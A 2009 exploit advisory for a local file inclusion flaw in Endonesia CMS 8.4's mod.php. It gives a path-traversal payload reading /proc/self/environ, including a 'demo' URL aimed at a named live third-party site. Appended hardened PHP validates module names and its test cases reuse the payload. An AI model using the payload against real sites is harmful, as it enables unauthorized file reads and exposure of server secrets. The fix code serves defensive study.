# Title : Endonesia CMS 8.4 local file inclusion
# Published : 2009-11-04
# Author : s4r4d0
[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: s4r4d0@yahoo.com
[*] Team: Fatal Error
[*] PoC: http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] Demo: http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435
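
[*] Added example (not part of the original advisory and not Endonesia's own code): a hardened replacement for the include shown in the SecurityReason note. It checks the module name against a strict pattern, then confirms the canonical path still sits inside the module directory. The function name resolve_module(), the temporary directory and the "news" module are assumptions made for the demo.

```php
<?php
// Added example, not Endonesia's code: resolve_module() and the directory
// layout below are assumptions made for illustration.

/** Map a request's module name to <modDir>/<name>/index.php, or null. */
function resolve_module(string $modDir, $mod): ?string
{
    // Strict name policy: no "/", "\", ".", NUL bytes, arrays or empty names.
    if (!is_string($mod) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $mod)) {
        return null;
    }
    // Canonicalise (resolves symlinks and "..") and require that the result
    // still sits under the module directory.
    $base = realpath($modDir);
    $path = realpath($modDir . '/' . $mod . '/index.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a throwaway module tree with one module, "news".
$modDir = sys_get_temp_dir() . '/mod_demo_' . getmypid();
mkdir($modDir . '/news', 0700, true);
file_put_contents($modDir . '/news/index.php', "<?php echo 'news module';\n");

$samples = [
    'news',                                         // legitimate module
    '/../../../../../../proc/self/environ' . "\0",  // the advisory's value, URL-decoded
    '../news',                                      // traversal that lands back inside
    'missing',                                      // well-formed but not installed
    ['news'],                                       // mod[]=news array input
];
foreach ($samples as $mod) {
    $file = resolve_module($modDir, $mod);
    printf("%-50s => %s\n", json_encode($mod), $file === null ? 'rejected' : "include $file");
}

// Remove the constructed demo tree.
unlink($modDir . '/news/index.php');
rmdir($modDir . '/news');
rmdir($modDir);

// In mod.php the call site would become (assumed wiring):
//   $file = resolve_module(__DIR__ . '/mod', $_GET['mod'] ?? '');
//   if ($file === null) { http_response_code(404); exit; }
//   include $file;
```

PHP has rejected NUL bytes in file paths since 5.3.4, which removes the %00 truncation, but an unvalidated $mod can still reach any index.php on disk, so the name check is needed regardless.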